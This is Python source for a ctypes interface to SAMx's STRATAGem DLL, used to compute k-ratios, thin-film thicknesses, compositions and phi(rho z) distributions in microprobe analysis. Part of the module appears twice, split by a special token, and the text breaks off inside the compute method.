return self._lib.StGetFluorFlg()
fluorescence = property(get_fluorescence, set_fluorescence, doc=
'Property to get/set fluorescence')
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
standard_directory = property(get_standard_directory,
set_standard_directory, doc='Property to get/set standard directory')
@_check_key
def compute_kratio_vs_thickness(self, layer, thickness_low_m,
thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2)
if layer not in self._layers:
raise ValueError('Unknown layer')
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
low_ = c.c_double(thickness_low_m * 1000000000.0)
high_ = c.c_double(thickness_high_m * 1000000000.0)
logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer,
thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_
):
self._raise_error('Cannot compute k-ratio vs thickness')
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error('Cannot get thickness')
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
@_check_key
def compute_kratio_vs_energy(self, energy_high_eV, step):
"""
Computes the variation of the k-ratio as a function of the incident
energy.
Note that the computation also starts at 0 keV up to the specified energy.
:arg energy_high_eV: upper limit of the thickness in electronvolts
:type energy_high_eV: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of energies in electronvolts
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each energy
"""
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
energy_ = c.c_double(energy_high_eV / 1000.0)
logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))
self._lib.StSetMaxHV(energy_)
logger.debug('StComputeKvsHV(key)')
if not self._lib.StComputeKvsHV(self._key):
self._raise_error('Cannot compute k-ratio vs energy')
energies = []
kratios = {}
k_ = c.c_double()
bHV_ = c.c_bool(True)
increment = float(energy_high_eV / 1000.0) / step
for i in range(step + 1):
hv = i * increment
hv_ = c.c_double(hv)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,
bHV_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
energies.append(hv)
return energies, kratios
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError('Thickness of layer %i is unknown' % i)
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = self.compute_kratio_vs_thickness(layer,
thickness_low_m, thickness_high_m, step)
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
@_check_key
def _compute_kratios_substrate(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_energy`.
"""
output = {}
step = 2
for experiment in self._experiments:
energy_high_eV = experiment.energy_eV
_energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,
step)
kratio = kratios[experiment][-1]
if kratio < 0:
logger.warn(
'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'
)
_energies, kratios = self.compute_kratio_vs_energy(
energy_high_eV + 1.0, step)
kratio = kratios[experiment][-1]
output.setdefault(experiment, kratio)
return output
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
:arg iteration_max: maximum number of iterations of the solve
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
"""
zs = set(exp.z for exp in self._experiments.keys())
for layer in (list(self._layers.keys()) + [self._substrate[0]]):
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False)
self.add_experiment(exp)
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error('Cannot start iteration')
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error('Cannot get number of elements')
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_
):
self._raise_error('Cannot get layer concentration')
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug('StSdGetThick(key, %i)', ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(
thick_known), c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error('Cannot get thickness')
return (composition, thickness.value / 10000000000.0,
mass_thickness.value * 10.0, density.value * 1000.0)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
* :math:`\\rho z` coordinates (in g/cm2)
* generated intensities of :math:`\\phi(\\rho z)` (no absorption)
* emitted intensites of :math:`\\phi(\\rho z)`
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1000.0)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)
self._lib.StSetScaleHV(maxhv_)
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
przs = {}
for experiment, indexes in self._experiments.items():
if maxdepth_m is None:
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1000.0
for z, fraction in self._substrate[0].composition.items():
dr = 0.0276 * atomic_mass_kg_mol(z
) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *
mass_density_kg_m3(z) / 1000.0)
maxdepth_m += fraction / (dr * 1e-06)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5
increment_kg_m2 = maxdepth_m * self._substrate[0
].density_kg_m3 / bins
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
<|reserved_special_token_1|>
"""
Main class of the interface.
It setups the experimental parameters such as the :class:`.Experiment`'s and
:class:`.Sample`, geometry (:attr:`geometry <Stratagem.geometry>`), type of
:math:`\\phi(\\rho z)` model (:attr:`prz_mode <Stratagem.prz_mode>`) and
fluorescence mode (:attr:`fluorescence <Stratagem.fluorescence>`).
"""
# Standard library modules.
import os
import ctypes as c
import logging
logger = logging.getLogger(__name__)
from operator import attrgetter
import random
import string
import functools
try:
import winreg
except ImportError:
try:
import _winreg as winreg
except ImportError:
class winreg:
HKEY_CURRENT_USER = None
class _PyHKEY(object):
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, traceback):
pass
def OpenKey(self, key, sub_key, res, sam):
return self._PyHKEY()
def QueryValueEx(self, key, value_name):
return None
# Third party modules.
# Local modules.
from stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF
from stratagemtools.experiment import Experiment, LINE_KA
from stratagemtools.element_properties import \
atomic_mass_kg_mol, mass_density_kg_m3
# Globals and constants variables.
_REGISTRY_KEY = "Software\SAMx\Stratagem\Configuration"
_REGISTRY_VALUENAME = 'InstallOEMDirectory'
PRZMODE_XPP = 0
""":math:`\\phi(\\rho z)` from XPP"""
PRZMODE_PAP = 1
""":math:`\\phi(\\rho z)` from PAP"""
PRZMODE_GAU = 2
""":math:`\\phi(\\rho z)` *unknown*, possibly two Gaussians"""
FLUORESCENCE_NONE = 0
"""No fluorescence"""
FLUORESCENCE_LINE = 1
"""Only characteristic fluorescence"""
FLUORESCENCE_LINE_CONT = 2
"""Characteristic and Bremsstrahlung fluorescence"""
_CONCENTRATION_FLAG_KNOWN = 0
_CONCENTRATION_FLAG_UNKNOWN = 1
_CONCENTRATION_FLAG_STOICHIOMETRIC = 2
_CONCENTRATION_FLAG_TRACE = 3
_CONCENTRATION_FLAG_DIFFERENCE = 4
class StratagemError(Exception):
"""
Exception raised for all errors related to the STRATAGem interface.
"""
pass
def _check_key(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
if self._key is None:
raise StratagemError('Not initialize. Call init().')
return method(self, *args, **kwargs)
return wrapper
class Stratagem:
"""
Main interface establishing a connection to the STRATAGem OEM interface and
perform calculations using SAMx's STRATAGem.
It is highly recommended to use :class:`Stratagem` as a context manager
(i.e. ``with`` statement) to ensure that the connection to the DLL is
properly closed.
For instance::
>>> with Stratagem() as strata:
... strata.prz_mode = PRZMODE_XPP
Otherwise the following series of method must be called::
>>> strata = Stratagem()
>>> strata.init()
>>> strata.prz_mode = PRZMODE_XPP
>>> strata.close()
"""
def __init__(self, dll_path=None, display_error=True):
"""
:arg dll_path: complete path to the location of ``stratadllogger.dll``
(optional). If ``None``, the path is found in the Windows registry
under ``Software\SAMx\Stratagem\Configuration``. If the DLL is not
found a :class:`StratagemError` is raised.
:type dll_path: :class:`str`
:arg display_error: whether to display a message dialog on error
:type display_error: :class:`bool`
"""
if dll_path is None:
with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY) as key: #@UndefinedVariable
basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0] #@UndefinedVariable
dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')
cwd = os.getcwd()
try:
logger.debug("dll=%s", dll_path)
self._lib = c.WinDLL(dll_path)
finally:
os.chdir(cwd) # Change back to real cwd
logger.debug("StEnableErrorDisplay(%r)", display_error)
self._lib.StEnableErrorDisplay(c.c_bool(display_error))
self._key = None
self._cwd = os.getcwd()
self._layers = {} # layer: index
self._substrate = None
self._experiments = {} # experiment: (element, line, kratio) indexes
self._tmpstandards = []
def __enter__(self):
self.init()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
self.close()
return False
def _stobjectnew(self, key=None, standard=False):
if key is None:
characters = string.ascii_lowercase
key = ''.join(random.choice(characters) for _ in range(8))
key = key.encode('ascii')
if not isinstance(key, c.c_byte):
key = c.create_string_buffer(key)
bnormal_ = c.c_bool(not standard)
iniflags_ = c.c_int(0)
logger.debug("StObjectNew(key, %r, %i)", not standard, 0)
if not self._lib.StObjectNew(key, bnormal_, iniflags_):
self._raise_error("Cannot create object")
return key
def _raise_error(self, alternate=''):
"""
Raises a :class:`StratagemError`.
The error code and message of known errors are retrieved from STRATAGem.
If this is not possible, *alternate* is used as the error message.
"""
errnum_ = c.c_ulong()
errtype_ = c.c_int()
self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
if errnum_.value != 0:
if errtype_.value == 0:
buf_ = c.create_string_buffer(256)
self._lib.StGetMsg(errnum_, buf_, 256)
raise StratagemError(buf_.value.decode('ascii'))
elif errtype_.value == 1:
raise c.WinError(errtype_.value)
else:
raise StratagemError('Error %i' % errnum_.value)
else:
raise StratagemError(alternate)
def init(self):
"""
Initializes and setups STRATAGem.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
raise RuntimeError('Already initialized. Call close() first.')
self._key = self._stobjectnew()
self._cwd = os.getcwd()
self.reset()
def close(self):
"""
Closes the connection to the STRATAGem DLL.
It does not have to be used if :class:`Stratagem` is used as a context
manager.
"""
if self._key is not None:
logger.debug('StObjectDelete(key)')
self._lib.StObjectDelete(self._key)
self._key = None
for filepath in self._tmpstandards:
os.remove(filepath)
logger.debug('Remove temporary standard: %s', filepath)
self.reset()
def reset(self):
"""
Resets all parameters to the defaults, remove all experiments and sample.
"""
if self._key:
self._lib.StObjectReset(self._key)
os.chdir(self._cwd)
self._layers.clear() # layer: index
self._substrate = None
self._experiments.clear() # analyzed experiments
self._tmpstandards.clear()
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = (sample.substrate, index)
@_check_key
def get_sample(self):
"""
Returns the current sample.
It can correspond to the sample defined by :meth:`set_sample` or the
sample resulting from the computations (see :meth:`compute`).
.. note:: a new sample is returned every time this method is called
:return: current sample
:rtype: :class:`Sample`
"""
sample = Sample(self._substrate[0].composition)
for layer in self._layers:
sample.add_layer(layer.composition, layer.thickness_m,
layer.mass_thickness_kg_m2, layer.density_kg_m3)
return sample
sample = property(get_sample, set_sample, doc="Property to set/get sample")
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug("StSdAddLayer(key)")
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug("StSdAddLayer(key, %i)", ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error("Cannot add layer")
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug("StSdAddElt(key, %i, %i)", ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error("Cannot add element")
z, wf = value
nra_ = c.c_int(z)
logger.debug("StSdSetNrAtom(key, %i, %i, %i)", ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error("Cannot set atomic number")
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug("StSdSetConc(key, %i, %i, %f)", ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error("Cannot set concentration")
logger.debug("StSdSetConcFlag(key, %i, %i, %i)", ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)):
self._raise_error("Cannot set concentration flag")
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1e3 # g/cm3
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 1e10 # Angstroms
mass_thickness = layer.mass_thickness_kg_m2 * 0.1 # g/cm2
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug("StSdSetThick(key, %i, %r, %d, %d, %d)", ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error("Cannot set thickness")
return int(ilayer_)
def _create_standard(self, standard):
"""
Internal method to create a new object defining the standard
:class:`.Sample`.
"""
# Create new object
key_ = self._stobjectnew(standard=True)
# Set sample
for layer in standard.layers:
self._add_layer(layer, substrate=False, key=key_)
self._add_layer(standard.substrate, substrate=True, key=key_)
# Save
filename = key_.value.decode('ascii') + '.tfs'
filepath = os.path.join(self.get_standard_directory(), filename)
filepath_ = c.create_string_buffer(filepath.encode('ascii'))
logger.debug('StObjectWriteFile(key, %s)', filepath)
if not self._lib.StObjectWriteFile(key_, filepath_):
self._raise_error("Cannot save standard")
# Delete object
self._lib.StObjectDelete(key_)
self._tmpstandards.append(filepath)
return filepath
@_check_key
def add_experiment(self, experiment):
"""
Adds an experiment, i.e. measurements of k-ratio at different energies.
.. hint:: Use :meth:`reset` method to remove defined experiments.
:arg experiment: experiment
:type experiment: :class:`Experiment`
"""
nra_ = c.c_int(experiment.z)
klm_ = c.c_int(experiment.line)
hv_ = c.c_double(experiment.energy_eV / 1e3)
ielt_ = c.c_int()
iline_ = c.c_int()
iexpk_ = c.c_int()
logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z, experiment.line)
if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_,
c.byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
self._raise_error("Cannot add atomic number and line")
standard = experiment.standard
if isinstance(standard, Sample):
standard = self._create_standard(standard)
standard_ = c.create_string_buffer(standard.encode('ascii'))
logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value, iline_.value, klm_.value, standard)
if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):
self._raise_error("Cannot set standard")
analyzed = experiment.is_analyzed()
analyzed_ = c.c_bool(analyzed)
logger.debug("StEdSetAnalyzedFlag(key, %i, %r)", ielt_.value, analyzed)
if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
self._raise_error("Cannot add experiment analyzed flag")
kratio_ = c.c_double(experiment.kratio)
logger.debug("StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)",
ielt_.value, iline_.value, iexpk_.value,
experiment.energy_eV / 1e3, experiment.energy_eV / 1e3,
experiment.kratio)
if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_,
hv_, hv_, kratio_, c.c_double(0.0),
c.c_int(2)):
self._raise_error("Cannot set experiment k-ratio")
if experiment.is_analyzed():
indexes = (ielt_.value, iline_.value, iexpk_.value)
self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
@_check_key
def set_geometry(self, toa, tilt, azimuth):
"""
Sets the geometry.
:arg toa: take off angle (in radians)
:arg tilt: tilt angle (in radians)
:arg azimuth: azimuthal angle (in radians)
"""
toa_ = c.c_double(toa)
tilt_ = c.c_double(tilt)
azimuth_ = c.c_double(azimuth)
logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)
if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):
self._raise_error("Cannot set geometry parameters")
@_check_key
def get_geometry(self):
"""
Returns the geometry.
:return: take off angle (in radians), tilt angle (in radians),
azimuthal angle (in radians)
"""
toa_ = c.c_double()
tilt_ = c.c_double()
azimuth_ = c.c_double()
logger.debug('StGetGeomParams(key)')
if not self._lib.StGetGeomParams(self._key, c.byref(toa_),
c.byref(tilt_), c.byref(azimuth_)):
self._raise_error("Cannot get geometry parameters")
return toa_.value, tilt_.value, azimuth_.value
geometry = property(get_geometry, doc='Property to get geometry')
@_check_key
def set_prz_mode(self, mode):
"""
Sets the type of model to use for the :math:`\\phi(\\rho z)`.
:arg mode: type of model, either
* :data:`PRZMODE_XPP`
* :data:`PRZMODE_PAP`
* :data:`PRZMODE_GAU`
:type mode: :class:`int`
"""
mode_ = c.c_int(mode)
logger.debug('StSetPrzMode(%i)', mode)
self._lib.StSetPrzMode(mode_)
@_check_key
def get_prz_mode(self):
"""
Returns the type of model to use for the :math:`\\phi(\\rho z)`.
:return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
:data:`PRZMODE_GAU`
:rtype: :class:`int`
"""
return self._lib.StGetPrzMode()
prz_mode = property(get_prz_mode, set_prz_mode,
doc='Property to get/set prz mode')
@_check_key
def set_fluorescence(self, flag):
"""
Sets the fluorescence flag.
:arg flag: either
* :data:`FLUORESCENCE_NONE`
* :data:`FLUORESCENCE_LINE`
* :data:`FLUORESCENCE_LINE_CONT`
:type flag: :class:`int`
"""
flag_ = c.c_int(flag)
logger.debug('StSetFluorFlg(%i)', flag)
self._lib.StSetFluorFlg(flag_)
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
return self._lib.StGetFluorFlg()
fluorescence = property(get_fluorescence, set_fluorescence,
doc='Property to get/set fluorescence')
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
standard_directory = property(get_standard_directory, set_standard_directory,
doc='Property to get/set standard directory')
@_check_key
def compute_kratio_vs_thickness(self, layer,
thickness_low_m, thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2) # unit in nm
if layer not in self._layers:
raise ValueError("Unknown layer")
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
# Compute
low_ = c.c_double(thickness_low_m * 1e9)
high_ = c.c_double(thickness_high_m * 1e9)
logger.debug('StComputeKvsThickness(key, %i, %f, %f)',
ilayer, thickness_low_m * 1e9, thickness_high_m * 1e9)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_):
self._raise_error("Cannot compute k-ratio vs thickness")
# Fetch results
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error("Cannot get thickness")
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error("Cannot get k-ratio")
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
@_check_key
def compute_kratio_vs_energy(self, energy_high_eV, step):
"""
Computes the variation of the k-ratio as a function of the incident
energy.
Note that the computation also starts at 0 keV up to the specified energy.
:arg energy_high_eV: upper limit of the thickness in electronvolts
:type energy_high_eV: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of energies in electronvolts
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each energy
"""
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
energy_ = c.c_double(energy_high_eV / 1e3)
logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1e3,))
self._lib.StSetMaxHV(energy_)
# Compute
logger.debug('StComputeKvsHV(key)')
if not self._lib.StComputeKvsHV(self._key):
self._raise_error("Cannot compute k-ratio vs energy")
# Fetch results
energies = []
kratios = {}
k_ = c.c_double()
bHV_ = c.c_bool(True)
increment = float(energy_high_eV / 1e3) / step
for i in range(step + 1):
hv = i * increment
hv_ = c.c_double(hv)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_, bHV_, c.byref(k_)):
self._raise_error("Cannot get k-ratio")
kratios.setdefault(experiment, []).append(k_.value)
energies.append(hv)
return energies, kratios
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError("Thickness of layer %i is unknown" % i)
# Compute
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = \
self.compute_kratio_vs_thickness(layer, thickness_low_m,
thickness_high_m, step)
# Reorganize results
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
@_check_key
def _compute_kratios_substrate(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_energy`.
"""
output = {}
step = 2
for experiment in self._experiments:
energy_high_eV = experiment.energy_eV
_energies, kratios = \
self.compute_kratio_vs_energy(energy_high_eV, step)
kratio = kratios[experiment][-1]
if (kratio < 0): # Bug in strategem that some energy don't work
logger.warn("STRATAGem returns a negative k-ratio, re-try with energy + 1 eV")
_energies, kratios = \
self.compute_kratio_vs_energy(energy_high_eV + 1.0, step)
kratio = kratios[experiment][-1]
output.setdefault(experiment, kratio)
return output
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
:arg iteration_max: maximum number of iterations of the solve
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
"""
# Add missing experiments
zs = set(exp.z for exp in self._experiments.keys())
for layer in list(self._layers.keys()) + [self._substrate[0]]:
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
